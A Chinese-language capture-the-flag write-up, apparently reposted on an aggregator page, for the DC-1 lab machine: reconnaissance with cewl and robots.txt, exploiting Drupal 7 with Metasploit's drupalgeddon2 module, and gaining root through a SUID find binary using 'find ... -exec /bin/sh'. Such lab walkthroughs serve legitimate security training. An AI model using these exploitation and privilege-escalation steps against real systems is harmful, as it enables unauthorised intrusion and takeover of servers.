zoukankan
html css js c++ java
DC1
1.收集信息
cms信息 使用的是Drupal的cms
端口信息 开开启了22端口,80端口,111端口
目录信息 扫到敏感目录
http://192.168.0.119/robots.txt
通过cewl收集敏感信息并生成字典
cewl http://192.168.0.119 -w passwd.txt
2.漏洞分析与利用
通过robots.txt查看敏感目录内容获取中重要信息
可以从uprgade.txt看出,使用的cms是版本为7.x的Drupal
搜索相关漏洞
进入msfconsle ——> search Drupal
尝试使用最新的,rank为execllent的payload: exploit/unix/webapp/drupal_drupalgeddon2
使用该payload后查看目标是否在可攻击版本范围内
设置攻击目标,得到session会话
3.尝试提权
内核作为最后杀招不得已再用。首先联想到常见几种提权方式,suid提权
python -c 'import pty;pty.spawn("/bin/bash")' #利用python的pty获得一个完整的tty
find / -perm -u=s -type f 2>/dev/null #将有suid权限的打印出来
发现常用于usid提权的工具find
cd /tmp #切换到tmp目录下
touch luojun #创建lj文件
find luojun -exec "whoami" ; #查询lj文件并执行whoami命令
成功发现执行命令的是root权限
find luojun -exec "/bin/bash" ; #将bash的shell反弹出来,发现失败了
find luojun -exec "/bin/sh" ; #将sh的shell反弹出来,发现成功,获得root权限
提权成功,接下来任意妄为寻找flag
查看全文
相关阅读:
Unity 网络通信以及buffer优化
Unity 滑动列表ScrollRect制作
Unity中一些辅助工具类
一个欠揍的广告语
翻译:使用 Asp.net mvc 15 分钟创建 Movie 数据库应用程序
[转]如何查找.NET程序内存不断上涨的原因(CLRProfiler)
[转载]SQL语句的解析过程
[转]C#汉字转换拼音技术详解(高性能)
adb devices 找不到设备的解决方法
JS中对象object的复制
原文地址:https://www.cnblogs.com/sup3rman/p/12389296.html
最新文章
[转]ASP.NET中 WebSite 跟 WebProject 的异同
[转]系统设计与规划
[转]DDD/Transaction Script/Active Record架构解惑
面向程序员的数据库访问性能优化法则 http://blog.csdn.net/yzsind/archive/2010/12/06/6059209.aspx
[转]Uml类图的一个例子
dynamics Ax 2009 实现 union 效果
强烈推荐:240多个jQuery插件
好几天没来
Jquery first view
Since150910
热门文章
150929.js过完
Review
151128一个半月没来,看的视频,其中由于费孝祥视频技术老掉牙且讲话枯燥,导致我荒废了半个月至一个月。
Worth or not
JS 生成商品sku
python 类中的特殊成员
python 迭代器,生成器,可迭代对象
httpserver基本配置
彻底掌握Python日期时间处理
Python调用C++底层库,互相传值问题
Copyright © 2011-2022 走看看